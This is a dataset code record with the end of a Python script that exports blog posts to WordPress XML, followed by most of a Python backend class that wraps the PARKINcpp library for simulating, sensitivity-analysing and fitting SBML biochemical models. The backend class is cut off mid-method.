<wp:post_date>%(post_date)s</wp:post_date>
<wp:post_date_gmt>%(post_gmt_date)s</wp:post_date_gmt>
</item>"""
for img in images:
img['post_name'] = nicename(img['name'])
img['pubdate'] = format_pubdate(img['date'])
img['post_date'] = format_isodate(img['date'])
img['post_gmt_date'] = format_gmtdate(img['date'])
img['categories'] = format_post_categories(img['categories'])
img['static_url'] = static_url
return u'\n'.join([format % img for img in images])
def format_items(items, site_url, static_url):
format = u""" <item>
<title>%(title)s</title>
<link>%(site_url)s/%(year)d/%(month)d/%(day)d/%(post_name)s/</link>
<pubDate>%(pubdate)s</pubDate>
<dc:creator><![CDATA[%(author)s]]></dc:creator>
%(categories)s
<description>%(description)s</description>
<guid isPermaLink="false">%(site_url)s/?p=%(post_id)d</guid>
<content:encoded><![CDATA[%(text)s]]></content:encoded>
<wp:post_id>%(post_id)d</wp:post_id>
<wp:post_date>%(post_date)s</wp:post_date>
<wp:post_date_gmt>%(post_gmt_date)s</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>%(post_name)s</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_type>post</wp:post_type>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
%(comments)s
</item>
%(images)s
"""
"""
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:menu_order>0</wp:menu_order>
<wp:post_password></wp:post_password>
<wp:postmeta>
<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value>1257151148</wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value>1</wp:meta_value>
</wp:postmeta>"""
for item in items:
item['pubdate'] = format_pubdate(item['date'])
item['post_date'] = format_isodate(item['date'])
item['post_gmt_date'] = format_gmtdate(item['date'])
item['post_name'] = nicename(item['title'])
item['comments'] = format_comments(item['comments'])
item['categories'] = format_post_categories(item['categories'])
item['site_url'] = site_url
item['year'] = item['date'].year
item['month'] = item['date'].month
item['day'] = item['date'].day
item['description'] = ''
item['text'] = item['text'].replace(u'</p>', u'</p>\n')
item['images'] = format_images(item['images'], static_url)
return u'\n'.join([format % item for item in items])
def nicename(s):
translatetable = {
u'\xe4' : u'a',
u'\xe5' : u'a',
u'\xf6' : u'o',
u'\xc4' : u'A',
u'\xc5' : u'A',
u'\xd6' : u'O',
u' ' : u'_',
u'!' : u'',
u'?' : u'',
u':' : u'',
}
x = ''.join([translatetable.get(c, c) for c in s])
return x.lower()
def format_post_categories(categories):
cat_dicts = [{
u'nicename':nicename(c),
u'fullname':c} for c in categories]
format = u' <category><![CDATA[%(fullname)s]]></category>\n <category domain="category" nicename="%(nicename)s"><![CDATA[%(fullname)s]]></category>'
return u'\n'.join([format % cat for cat in cat_dicts])
def format_categories(categories):
cat_dicts = [{
u'nicename':nicename(c),
u'fullname':c} for c in categories]
format = u' <wp:category><wp:category_nicename>%(nicename)s</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[%(fullname)s]]></wp:cat_name></wp:category>'
return u'\n'.join([format % cat for cat in cat_dicts])
def export(articles, categories, bloginfo, outfile):
fp = file(u'wp_template.xml', 'r')
template = unicode(fp.read())
fp.close()
bloginfo['pubdate'] = format_pubdate(UTC_TIMEZONE.localize(datetime.datetime.utcnow()))
bloginfo['creation_date'] = time.strftime('%Y-%m-%d %H:%M')
bloginfo['categories'] = format_categories(categories)
bloginfo['items'] = format_items(articles, bloginfo['site_url'], bloginfo['static_url'])
out = template % bloginfo
if outfile:
fp = file(outfile, 'w')
fp.write(out.encode('utf-8'))
fp.close()
| bsd-3-clause | -5,936,456,404,222,159,000 | 35.369318 | 196 | 0.582253 | false |
gabrielmueller/aljebra-topo | src/backend_parkincpp/parkincppbackend.py | 1 | 53170 | from collections import OrderedDict
import logging
import math, time, sys
import libsbml
from basics.logging.stdoutwrapper import StdOutWrapper
import backend
from backend.basebackend import BaseBackend
from backend.exceptions import InitError
from backend import settingsandvalues
import datamanagement.entitydata
from datamanagement.dataset import DataSet
from datamanagement.entitydata import EntityData
from odehandling.odemanager import ODEManager
from odehandling.odewrapper import ODEWrapper
from sbml_model.sbml_entities import SBMLEntity
import services
from services.dataservice import DataService
from services.optionsservice import OptionsService
from parkincpp.parkin import ValueList, StringList, ExpressionMap, ExprTypeMap, BioSystem, Expression, Param, Vector, BioProcessor, Matrix, QRconDecomp, IOpt, MeasurementPoint, MeasurementList
from parkincpp.parkin import MakeCppOStream
TASK_PARAMETER_IDENTIFICATION = "task_parameter_identification"
TASK_SENSITIVITY_OVERVIEW = "task_sensitivity_overview"
TASK_SENSITIVITIES_DETAILS = "task_sensitivites_details"
class ParkinCppBackend(BaseBackend):
"""
This class uses the SWIG-wrapped PARKINcpp library to do computations.
It is used to do:
- Simple (forward) integration
- Compute sensitivites (and subconditions)
- Identify Parameters ("Fit") based on experimental data
- Manage experimental and simulation data
- Invoke plots and result tables
- Manage Parameter Sets
- Manage/Show/Edit Species and Parameter values.
TODO (big one): Refactor this class and split it up in meaningful functional units. As it is,
it is much too large.
@since: 2010-12-17
"""
__author__ = "Moritz Wade"
__contact__ = "[email protected]"
__copyright__ = "Zuse Institute Berlin 2010"
def __init__(self):
"""
Do parameterless initialization here.
Mostly, set up lots of class variables.
"""
super(ParkinCppBackend, self).__init__()
logging.info("Loading PARKINcpp library interface...")
self.selectedParams = None
self.mainModel = None
self.settings = None
self.odeManager = None
self.bioSystem = None
self.bioProcessor = None
self.rawSimResultVector = None
self.timepoints = None
self.timepointsPruned = None
self.sensitivityTimepoints = None
self.sensitivityTrajectoryMap = None
self.paramToSensitivityMap = OrderedDict()
self.parameterSensitivity = None
self.speciesParameterSensitivity = None
self.paramToEstimateMap = OrderedDict()
# we set lots of variables as class variables because they might otherwise go out of scope (in Python)
# when passed to SWIG-generated interfaces...
self.sensitivityTimepoints = None
self.sensitivityTimepointsVector = None
self.timepointVector = None
self.measurementMapVector = None
self.breakpoints = None
self.eventMap = None
self.paramMap = None
self.paramThresholdMap = None
self.speciesThresholdMap = None
self.iOpt = None
self.optionsService = OptionsService()
self.dataService = DataService()
self.mode = backend.settingsandvalues.MODE_INTEGRATE # default mode
def __del__(self):
self.wait() #blocks this thread until it has finished
def setMode(self, mode):
"""
Sets the main computation mode of the backend:
- C{backend.settingsandvalues.MODE_INTEGRATE}
- C{backend.settingsandvalues.MODE_SENSITIVITIES_OVERVIEW}
- C{backend.settingsandvalues.MODE_SENSITIVITIES_DETAILS}
- C{backend.settingsandvalues.MODE_PARAMETER_ESTIMATION}
Don't set the mode string "by hand". Use the "constants" defined
in backend.settingsandvalues!
@param mode: A mode string
@type mode: str
"""
self.mode = mode
def setSettings(self, settings):
"""
Set the settings dictionary. Keys are from
C{backend.settingsandvalues.SETTING_*}.
@parameter settings: Dictionary with settings
@type settings: {}
"""
self.settings = settings
def setMainModel(self, model):
"""
Set the reference to the main model that is needed
everywhere throughout the class.
@parameter model: Current/active main model
@type model: L{SBMLMainModel}
"""
self.mainModel = model
def setParamsForSensitivity(self, paramMap):
"""
Method to set the parameters (given a dict) for which the sensitivities are to be calculated
from the outside.
"""
self.paramToSensitivityMap = paramMap
def setParamsForEstimation(self, paramMap):
"""
Method to set the parameters (given a dict) for which values are to be identified
from the outside.
"""
self.paramToEstimateMap = paramMap
def setTimepointsForDetailedSensitivities(self, timepoints):
"""
Public method to set the timepoints for which to return
the detailed sensitivities (e.g. subconditions).
Has to be called before computing the detailed sensitivities.
"""
if not timepoints:
self.timepoints = None
return
startTime = self.settings[settingsandvalues.SETTING_STARTTIME]
endTime = self.settings[settingsandvalues.SETTING_ENDTIME]
self.sensitivityTimepoints = []
for timepoint in timepoints:
if startTime < timepoint and timepoint <= endTime:
self.sensitivityTimepoints.append(timepoint)
def initialize(self, mainModel, settings):
"""
Do real initialization given a model and settings.
Before the actual computations are invoked (see self._doSimulation and self._computeSensitivities),
the ODEManager is generated (and filled with data) and given to self._createBioSystem to create
a BioParkinCpp BioSystem instance.
This does not run in a Thread. (self._compute() does)
"""
if mainModel:
self.mainModel = mainModel
if settings:
self.settings = settings
if self.mainModel is None or self.settings is None:
errorMsg = "Can't invoke PARKINcpp library without Model/Settings."
logging.error(errorMsg)
raise InitError(errorMsg)
initStartTime = time.time()
# Create ODEManager and fill with data
self.odeManager = self._createOdeManager()
# create the "bio system" (basically one of the two main PARKINCpp classes for interfacing with BioPARKIN)
self._createBioSystem()
self._createBioProcessor()
initEndTime = time.time()
timeElapsed = initEndTime - initStartTime
logging.info("Initialization of PARKINcpp backend took %s seconds" % round(timeElapsed, 2))
def _compute(self):
"""
Do not call this directly! Call start() instead. This will run as a thread.
Invokes computations. Be sure to have set self.mode to the appropriate mode
(settingsandvalues.MODE_INTEGRATE or one of the sensitivity/parameter estimation modes) first.
"""
if not self.odeManager:
errorMsg = "Can't invoke computation. ODEManager has not been set up."
logging.error(errorMsg)
raise InitError(errorMsg)
computeStartTime = time.time()
# switch to relevant computation mode
if self.mode == settingsandvalues.MODE_INTEGRATE:
self.start_progress_report(False, "Starting Integrator...")
integrationSuccess = self._doSimulation()
if not integrationSuccess:
logging.error("Error while integrating.")
logging.debug("ParkinCppBackend._compute(): Error while integrating.")
self.stop_progress_report("Could not start integrator.")
return
self.stop_progress_report(settingsandvalues.FINISHED_INTEGRATION) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_SENSITIVITIES_OVERVIEW:
self.start_progress_report(False, "Computing Sensitivity Overview...")
computationSuccess = self._computeSensitivityOverview()
if not computationSuccess:
logging.error("Error while computing sensitivity overview.")
logging.debug("ParkinCppBackend._compute(): Computation of sensitivities returned False.")
self.stop_progress_report("Error while computing sensitivities.")
return
self.stop_progress_report(settingsandvalues.FINISHED_SENSITIVITY_OVERVIEW) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_SENSITIVITIES_DETAILS:
self.start_progress_report(False, "Computing Detailed Sensitivities...")
computationSuccess = self._computeSensitivityDetails()
if not computationSuccess:
logging.error("Error while computing detailed sensitivities.")
logging.debug("ParkinCppBackend._compute(): Computation of sensitivities returned False.")
self.stop_progress_report("Error while computing sensitivities.")
return
self.stop_progress_report(settingsandvalues.FINISHED_SENSITIVITY_DETAILS) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_PARAMETER_ESTIMATION:
self.start_progress_report(False, "Identifying Parameters...")
computationSuccess = self._doParameterEstimation()
if not computationSuccess:
logging.error("Error while identifying parameters.")
logging.debug("ParkinCppBackend._compute(): Parameter identification returned False.")
self.stop_progress_report("Error while identifying parameters. (Did you load experimental data?)")
return
self._handleEstimatedParamResults()
self.stop_progress_report(settingsandvalues.FINISHED_PARAMETER_ESTIMATION) # also emits the finished signal
computeEndTime = time.time()
timeElapsed = computeEndTime - computeStartTime
logging.info("Computation took %s seconds" % round(timeElapsed, 2))
def _createOdeManager(self):
"""
Creates the ODEManager, sets all settings, and calls init() on that object so that the ODEManager
calculates a number of metrics for later consumption (e.g. when creating the BioModel).
"""
logging.debug("Creating ODE Manager...")
self.odeManager = ODEManager(self.mainModel)
self.odeManager.startTime = self.settings[settingsandvalues.SETTING_STARTTIME]\
if settingsandvalues.SETTING_STARTTIME in self.settings\
else settingsandvalues.DEFAULT_STARTTIME
self.odeManager.endTime = self.settings[settingsandvalues.SETTING_ENDTIME] if settingsandvalues.SETTING_ENDTIME\
in self.settings else settingsandvalues.DEFAULT_ENDTIME
# 29.08.12 td: debug flag for ODE solver: switched on if debugging active via command line switch
self.odeManager.debugflag = 1 if self.optionsService.getDebug() else 0
self.odeManager.rtol = self.settings[settingsandvalues.SETTING_RTOL] if settingsandvalues.SETTING_RTOL\
in self.settings else settingsandvalues.DEFAULT_RTOL
self.odeManager.atol = self.settings[settingsandvalues.SETTING_ATOL] if settingsandvalues.SETTING_ATOL\
in self.settings else settingsandvalues.DEFAULT_ATOL
self.odeManager.xtol = self.settings[settingsandvalues.SETTING_XTOL] if settingsandvalues.SETTING_XTOL\
in self.settings else settingsandvalues.DEFAULT_XTOL
self.odeManager.init()
return self.odeManager
def _createBioSystem(self):
"""
Uses the ODEManager to create a system of BioParkinCpp Expression objects
(+ other data and information).
"""
if not self.odeManager:
logging.debug("ParkinCppBackend._createBioSystem invoked without ODEManager.")
return None
logging.info("Creating BioSystem...")
parameter = StringList()
expressionMap = ExpressionMap()
typeMap = ExprTypeMap()
self.bioSystem = BioSystem(float(self.odeManager.startTime), float(self.odeManager.endTime))
logging.info("Start time: %s" % self.odeManager.startTime)
logging.info("End time: %s" % self.odeManager.endTime)
rTol = float(self.odeManager.rtol)
aTol = float(self.odeManager.atol)
logging.info("RTOL: %s" % rTol)
logging.info("ATOL: %s" % aTol)
self.bioSystem.setSolverRTol(rTol)
self.bioSystem.setSolverATol(aTol)
flag = int(self.odeManager.debugflag)
self.bioSystem.setSolverDebugFlag(flag)
logging.info("Monitoring of ODE Solver: %d" % flag)
# set names / identifies of parameters
for paramWrapper in self.odeManager.parameterList:
pID = paramWrapper.getCombinedId()
# logging.debug("Putting Parameter %s into BioSystem." % pID)
parameter.push_back(pID)
for compartmentWrapper in self.odeManager.compartmentList: # we handle compartments as if they were parameters
pID = compartmentWrapper.getId()
parameter.push_back(pID)
self.bioSystem.setParameters(parameter)
# set the initial value(s) for ODE system
for speciesWrapper in self.odeManager.speciesList:
try:
value = float(speciesWrapper.getInitialValue())
except : # if initial value is None (it probably will be set by an AssignmentRule)
value = 0
self.bioSystem.setInitialValue(speciesWrapper.getId(), value)
# set expressions for ODE system
# put reactions into the BioSystem (within ExpressionMap)
substitutionMap = ExpressionMap()
# AssignmentRules are replaced directly inside reactions
for assignmentRule in self.odeManager.assignmentRuleList:
substitutionMap[assignmentRule.getId()] = assignmentRule.mathForBioParkinCpp()
# Reactions use replaced AssignmentRules and are themselves used for replacing their IDs in ODEs
for reactionWrapper in self.odeManager.reactionList:
expression = reactionWrapper.mathForBioParkinCpp(idsToReplace=substitutionMap)
if expression:
substitutionMap[reactionWrapper.getId()] = expression
# Params are used with their combined ID: "scope_id"
for paramWrapper in self.odeManager.parameterList:
expression = Expression(paramWrapper.getCombinedId())
substitutionMap[paramWrapper.getId()] = expression
# Finally, ODE Expressions are created using all the above substitutions
for odeWrapper in self.odeManager.odeList:
expression = odeWrapper.mathForBioParkinCpp(idsToReplace=substitutionMap)
expressionMap[odeWrapper.getId()] = expression
if odeWrapper.isDAE():
typeMap[odeWrapper.getId()] = 2
logging.info("DAE with ID %s : 0 = %s" % (odeWrapper.getId(), expression))
else:
# 09.08.12 td: default value for typeMap within PARKINcpp
# typeMap[odeWrapper.getId()] = 1
logging.info("ODE for ID %s = %s" % (odeWrapper.getId(), expression))
self.bioSystem.setODESystem(expressionMap)
self.bioSystem.setODETypes(typeMap)
self._initBioSystemParameters()
self._setBioSystemEvents()
def _initBioSystemParameters(self):
"""
Set initial param values for BioSystem.
"""
for paramWrapper in self.odeManager.parameterList:
pID = paramWrapper.getCombinedId()
initialValue = self.mainModel.getValueFromActiveSet(pID)
self.bioSystem.setParamValue(pID, initialValue)
for compartmentWrapper in self.odeManager.compartmentList: #again, handle compartments as parameters
pID = compartmentWrapper.getId()
initialSize = compartmentWrapper.getSize()
self.bioSystem.setParamValue(pID, initialSize)
def _setBioSystemEvents(self):
"""
Check if the model defines events.
Note: we currently only support ONE format for triggers: eq(time, float) where float is an actual float.
E.g.: eq(time, 10.0)
Note: We currently only support ONE type of assignment. They have to target a SPECIES. The right hand side,
the assignment, is arbitrary and will be converted to a PARKINcpp Expression.
"""
if len(self.mainModel.SbmlEvents) == 0:
logging.info("Model does not have events. No need to set any.")
return
logging.info("Processing SBML Events...")
errorMsg = "ParkinCppBackend: The only support event trigger has the format: eq(time, float) where float is an actual float. E.g.: eq(time, 10.0)"
events = OrderedDict()
events[self.settings[
settingsandvalues.SETTING_STARTTIME]] = None # kind of a default breakpoint at 0 that we always jump over
for eventEntity in self.mainModel.SbmlEvents:
try:
sbmlEvent = eventEntity.Item
trigger = sbmlEvent.getTrigger()
# we currently only support ONE format for triggers: eq(time, float) where float is an actual float
triggerMathString = libsbml.formulaToString(trigger.getMath())
errorMsg += "\nThe current trigger is %s" % triggerMathString
if not triggerMathString.startswith("eq(time,"):
errorMsg += "\nThe current trigger is %s" % triggerMathString
logging.error(errorMsg)
continue
timeString = triggerMathString.split(",")[1].split(")")[0].strip() # TODO: A RegEx would be nicer
time = float(timeString)
if not self.settings[settingsandvalues.SETTING_STARTTIME] < time < self.settings[settingsandvalues.SETTING_ENDTIME]:
logging.info("Event ID %s at timepoint %s is out of integration interval." % (sbmlEvent.getId(), time))
continue
logging.info("Processed event. ID: %s\tTime: %s" % (sbmlEvent.getId(), time))
numEventAssignments = sbmlEvent.getNumEventAssignments()
if numEventAssignments < 1:
continue
events[time] = []
for i in xrange(numEventAssignments):
eventAssignment = sbmlEvent.getEventAssignment(i)
target = str(eventAssignment.getVariable())
assignmentMath = eventAssignment.getMath()
events[time].append((target, assignmentMath))
# logging.debug("\tTarget: %s\tAssignment: %s" % (target,assignmentMath))
except Exception, e:
logging.error("%s\nException: %s" % (errorMsg, e))
events[self.settings[settingsandvalues.SETTING_ENDTIME]] = None
try:
self.breakpoints = Vector(ValueList(events.keys()))
self.bioSystem.setBreakpoints(self.breakpoints)
for i, (time, assignmentList) in enumerate(events.items()):
if i == 0 or i == len(self.breakpoints) - 1 or not assignmentList:
continue
self.eventMap = self.bioSystem.getEvent(i)
for target, assignment in assignmentList:
wrappedAssignment = ODEWrapper(None, mathNode=assignment, mainModel=self.mainModel)
expressionBioParkinCpp = wrappedAssignment.mathForBioParkinCpp()
self.eventMap[target] = expressionBioParkinCpp
logging.info("Event #%s\tTime: %s\tTarget: %s\tExpression: %s" % (i,time,target,expressionBioParkinCpp))
self.bioSystem.setEvent(i, self.eventMap)
except Exception, e:
logging.error("ParkinCppBackend._setBioSystemEvents(): Error while creating events: %s" % e)
return
def _createBioProcessor(self):
"""
This creates the BioProcessor. The BioProcessor is the means to do
computations on a BioSystem object.
It provides methods for forward integrations, sensitivity calculations, and
parameter identification.
The BioProcessor is the abstraction level between BioPARKIN and actual
internal numerical classes like GaussNewton, Parkin, etc.
"""
self.bioProcessor = BioProcessor(self.bioSystem, self.settings[settingsandvalues.SETTING_IDENTIFICATION_BACKEND])
# 22.08.12 td : need to wrap sys.stdout *first* ; only then the redirected stream can be set to parkin
# # 21.08.12 td : an awkward trail to get the two logging systems (dlib::logger & logging), somehow unified
# self.bioProcessor.setLogStream(MakeCppOStream(sys.stdout))
def _doSimulation(self):
"""
Entry point to start a normal forward computation run.
"""
if not self.bioSystem:
logging.debug("ParkinCppBackend._doSimulation invoked without a bioSystem.")
return False
if not self.bioProcessor:
logging.debug("ParkinCppBackend._doSimulation invoked without a BioProcessor.")
return False
rawSimData = self._computeTimecourse()
simDataSet = self._handleSimulationResults(rawSimData)
self.dataService.add_data(simDataSet)
return True
def _computeTimecourse(self):
"""
Does a single forward calculation and puts the results
into some class variables.
"""
logging.info("Computing Timecourse...")
trajectoryMap = self.bioProcessor.computeModel()
# extract the computed solution vectors
tp = self.bioProcessor.getAdaptiveTimepoints()
self.timepointsPruned = [tp.t()[i] for i in xrange(tp.nr())]
self.timepoints = [self.settings[backend.settingsandvalues.SETTING_STARTTIME]] + self.timepointsPruned
simResults = OrderedDict()
for speciesId in trajectoryMap.keys():
correspondingSpecies = self.mainModel.getSpecies(speciesId)
if correspondingSpecies: # 09.08.12 td: what happens with DAE entries??? They have no SBML corresponding IDs
dataTuple = trajectoryMap[speciesId]
data = list(dataTuple)
data.insert(0, correspondingSpecies.getInitialValue())
simResults[correspondingSpecies] = data
return simResults
def _handleSimulationResults(self, simResults):
"""
Strutures the data so that the DataService can make use of it.
"""
logging.info("Handling simulation results...")
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SIMULATION)
dataSet.setId(settingsandvalues.SIMULATION_RESULTS)
dataSet.setSelected(True)
for speciesEntity, data in simResults.items():
entityData = EntityData()
entityData.setId(speciesEntity.getId())
entityData.setType(datamanagement.entitydata.TYPE_SIMULATED)
entityData.setAssociatedDataSet(dataSet)
entityData.setSelected(True)
entityData.timepoints = self.timepoints
entityData.datapoints = data
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
entityData.sbmlEntity = speciesEntity
dataSet.setData(entityData, keyEntity=speciesEntity)
return dataSet
def _handleSensitivityResults(self, sensResults):
"""
Strutures the sensitivity data so that the DataService can make use of it.
"""
logging.info("Handling sensitivity results...")
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SENSITIVITY_DETAILS_SUBCONDITION)
dataSet.setId(settingsandvalues.SENSITIVITY_RAW_JACOBIAN)
dataSet.setSelected(True)
for (speciesEntity, paramID), data in sensResults.items():
entityData = EntityData()
entityData.setId("%s/%s" % (speciesEntity.getId(), paramID))
entityData.setType(datamanagement.entitydata.TYPE_SIMULATED)
entityData.setAssociatedDataSet(dataSet)
entityData.setSelected(True)
entityData.timepoints = self.timepoints
entityData.datapoints = data
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
entityData.sbmlEntity = speciesEntity
dataSet.setData(entityData, keyEntity=speciesEntity)
return dataSet
def _computeSensitivityOverview(self):
"""
Computing the sensitivities of parameters using the
PARKINcpp library.
"""
logging.info("Computing Sensitivity Overview...")
self.report_progress(text="Computing Sensitivity Overview...")
isSetUp = self._setUpBioProcessor(mode = TASK_SENSITIVITY_OVERVIEW)
if not isSetUp:
logging.error("Could not start sensitivity computation.")
return False
if not self.bioProcessor:
return False
# # set up FORTRAN console capturing
# # found here: http://stackoverflow.com/questions/977840/redirecting-fortran-called-via-f2py-output-in-python
# # open 2 fds
# #null_fds = [os.open(os.devnull, os.O_RDWR) for x in xrange(2)]
# null_fds = [os.open("d:/test%s.txt" % x, os.O_RDWR) for x in xrange(2)]
# # save the current file descriptors to a tuple
# save = os.dup(1), os.dup(2)
# # put /dev/null fds on 1 and 2
# os.dup2(null_fds[0], 1)
# os.dup2(null_fds[1], 2)
self.bioProcessor.computeSensitivityTrajectories() # compute non-scaled trajectories but don't use them
self.sensitivityTrajectoryMap = self.bioProcessor.getScaledSensitivityTrajectories() # always get the scaled trajectories
if not self.sensitivityTrajectoryMap:
logging.error("Computation of Sensitivity Overview failed. Empty trajectory map returned.")
return False
# update timepoints to those that were actually used (generated) during sensitivity calculations
tp = self.bioProcessor.getAdaptiveTimepoints()
self.timepointsPruned = [tp.t()[i] for i in xrange(tp.nr())]
self.timepoints = [self.settings[backend.settingsandvalues.SETTING_STARTTIME]] + self.timepointsPruned
# # 2nd part of FORTRAN console capturing
# # restore file descriptors so I can print the results
# os.dup2(save[0], 1)
# os.dup2(save[1], 2)
# # close the temporary fds
# os.close(null_fds[0])
# os.close(null_fds[1])
dataSets = {}
for key, dataPoints in self.sensitivityTrajectoryMap.items():
if len(dataPoints) == 0:
logging.error("No trajectory for %s" % key)
continue
splitKey = key.split(" / ")
speciesId = splitKey[0]
paramId = splitKey[1]
if not dataSets.has_key(paramId):
dataSet = DataSet(None) # no filename given
dataSet.setType(services.dataservice.SENSITIVITY_OVERVIEW)
dataSet.setId(paramId)
dataSet.setSelected(True)
dataSets[paramId] = dataSet
self.dataService.add_data(dataSet)
else:
dataSet = dataSets[paramId]
speciesEntity = self.mainModel.getSpecies(speciesId)
if not speciesEntity.getComputeSensitivity(): # don't save data of non-selected species
continue
entityData = EntityData()
entityData.setId(speciesId)
entityData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_OVERVIEW)
entityData.setAssociatedDataSet(dataSet)
entityData.setSbmlEntity(speciesEntity)
entityData.setSelected(True)
entityData.timepoints = self.timepointsPruned
entityData.datapoints = list(dataPoints)
entityData.dataDescriptorName = "Timepoint"
# can't set dataDescriptorUnit here because the backend knows nothing about it
# TODO: Handle DataDescriptorUnit
dataSet.setData(entityData, keyEntity=speciesId)
# logging.debug("Adding data for Species %s" % speciesId)
logging.info("Finished computing Sensitivity Overview...")
return True
def _computeSensitivityDetails(self):
logging.info("Computing Detailed Sensitivities...")
isSetUp = self._setUpBioProcessor(mode = TASK_SENSITIVITIES_DETAILS)
if not isSetUp:
logging.error("Could not start sensitivity computation.")
return False
if not self.bioProcessor:
return False
if not self.sensitivityTimepoints:
logging.debug("ParkinCppBackend._computeSensitivityDetails(): No timepoints set, aborting.")
logging.error("No timepoints given. Please provide some.")
return False
logging.debug("ParkinCppBackend._computeSensitivityDetails(): Setting timepoints for detailed sensitivities to %s" % self.sensitivityTimepoints)
self.sensitivityTimepointsVector = Vector(ValueList(self.sensitivityTimepoints))
logging.debug("ParkinCppBackend._computeSensitivityDetails(): About to prepare detailed sensitivities...")
errorInt = self.bioProcessor.prepareDetailedSensitivities(self.sensitivityTimepointsVector)
if errorInt != 0:
logging.error("Could not prepare detailed sensitivities. Return code: %s" % errorInt)
return False
qrConDecompVector = self.bioProcessor.getSensitivityDecomps()
rawJacobianMatrixVector = self.bioProcessor.getSensitivityMatrices() # gets raw Jacobian matrix
for i, qrConDecomp in enumerate(qrConDecompVector):
timepoint = self.sensitivityTimepoints[i]
subconditionDataSet = self._computeSensSubconditions(qrConDecomp, timepoint)
rank = qrConDecomp.getRank()
logging.info("Rank of matrix at timepoint %s: %s" % (timepoint, rank))
self.dataService.add_data(subconditionDataSet)
for i, rawJacobianMatrix in enumerate(rawJacobianMatrixVector):
timepoint = self.sensitivityTimepoints[i]
speciesParameterSensitivity = self._handleJacobianMatrix(rawJacobianMatrix, timepoint)
self.dataService.add_data(speciesParameterSensitivity)
logging.info("Finished computing Detailed Sensitivities...")
return True
def _handleJacobianMatrix(self, rawJacobian, timepoint):
"""
The raw Jacobian matrix will be packed into EntityData objects (one per Parameter).
The resulting output is wrapping into a DataSet structure.
"""
if type(rawJacobian) is not Matrix:
logging.debug("parkinCppBackend._computeSpeciesParameterSens: Didn't get a Matrix as input.")
return None
numSpecies = len(self.odeManager.odeList)
if (rawJacobian.nr() % numSpecies != 0):
logging.debug("parkinCppBackend._computeSpeciesParameterSens: Wrong format of raw Jacobian.")
return None
logging.info("Preparing sensitivity data for timepoint %s..." % timepoint)
listOfSpecies = self.bioSystem.getSpecies()
speciesParameterSensitivity = DataSet(None)
speciesParameterSensitivity.setId("%s | Timepoint %s" % (settingsandvalues.SENSITIVITY_PER_PARAM_AND_SPECIES, timepoint))
speciesParameterSensitivity.setType(services.dataservice.SENSITIVITY_DETAILS_JACOBIAN)
speciesParameterSensitivity.setSelected(True)
for k, param in enumerate(self.selectedParams): # needed to get Param object corresponding to index
jacobianColumn = rawJacobian.colm(k+1) # note: type(rawJacobian)==Matrix starts counting with 1, not with 0
paramID = param.getCombinedId()
sensData = [abs(jacobianColumn[j]) for j in xrange(jacobianColumn.nr())] # convert Vector to list
paramSpeciesData = EntityData()
paramSpeciesData.setAssociatedDataSet(speciesParameterSensitivity)
paramSpeciesData.setId("Sensitivity of Parameter %s for timepoint %s" % (paramID, timepoint))
paramSpeciesData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_DETAILS_JACOBIAN)
paramSpeciesData.dataDescriptors = listOfSpecies
paramSpeciesData.datapoints = sensData
paramSpeciesData.setSelected(True)
speciesParameterSensitivity.setData(paramSpeciesData, keyEntity=param)
return speciesParameterSensitivity
def _computeSensSubconditions(self, qr, timepoint):
"""
Takes the qr-decomposed matrix and computes subconditions. This method
then puts the resulting data into a DataSet.
"""
if type(qr) is not QRconDecomp:
logging.debug("FortranBackend._computeSensSubconditions: Didn't get a QRconDecomp as input.")
return None
logging.info("Computing Subconditions...")
diagonals = qr.getDiag()
rank = qr.getRank() # not used right now
logging.info("QR decomposition rank: %s" % rank)
logging.debug("QR decompsition diag: %s" % diagonals.t())
pivotIndices = qr.getPivot()
colSubconditions = []
firstDiag = abs(diagonals[0])
for i in xrange(len(diagonals)):
diagEntry = abs(diagonals[i])
if diagEntry != 0.0 and i < rank:
colSubcondition = firstDiag / diagEntry
colSubconditions.append(colSubcondition)
else:
colSubconditions.append(float("nan"))
maxValue = max(colSubconditions)
colSubconditionsScaled = []
for i in xrange(len(colSubconditions)):
oldValue = colSubconditions[i]
if math.isnan(oldValue):
scaledValue = oldValue # push "nan" through to the end; should be handled by Views
else:
scaledValue = oldValue / maxValue
colSubconditionsScaled.append(scaledValue)
# 4th: put into DataSet
subconditionsDataSet = DataSet(None)
subconditionsDataSet.setId("%s | Timepoint %s" % (settingsandvalues.SENSITIVITY_SUBCONDITION_PER_PARAM, timepoint))
subconditionsDataSet.setType(services.dataservice.SENSITIVITY_DETAILS_SUBCONDITION)
subconditionsDataSet.setSelected(True)
for i in xrange(len(colSubconditionsScaled)):
paramIndex = int(pivotIndices[i] - 1) # pivot elements are counted 1-based
param = self.selectedParams[paramIndex]
subconditionScaled = colSubconditionsScaled[i]
subconditionAbs = colSubconditions[i]
paramData = EntityData()
paramData.setAssociatedDataSet(subconditionsDataSet)
paramData.setId("Sensitivity Subcondition of Parameter %s at timepoint %s" % (param.getCombinedId(), timepoint))
paramData.setType(datamanagement.entitydata.TYPE_SENSITIVITY_DETAILS_SUBCONDITION)
paramData.dataDescriptors = ["Subcondition (as %% of %g)" % maxValue, settingsandvalues.SUBCONDITION_HEADER_ABSOLUTE]
paramData.datapoints = [subconditionScaled, subconditionAbs]
paramData.setSelected(True)
subconditionsDataSet.setData(paramData, keyEntity=param)
return subconditionsDataSet
def _setUpBioProcessor(self, mode = TASK_PARAMETER_IDENTIFICATION):
"""
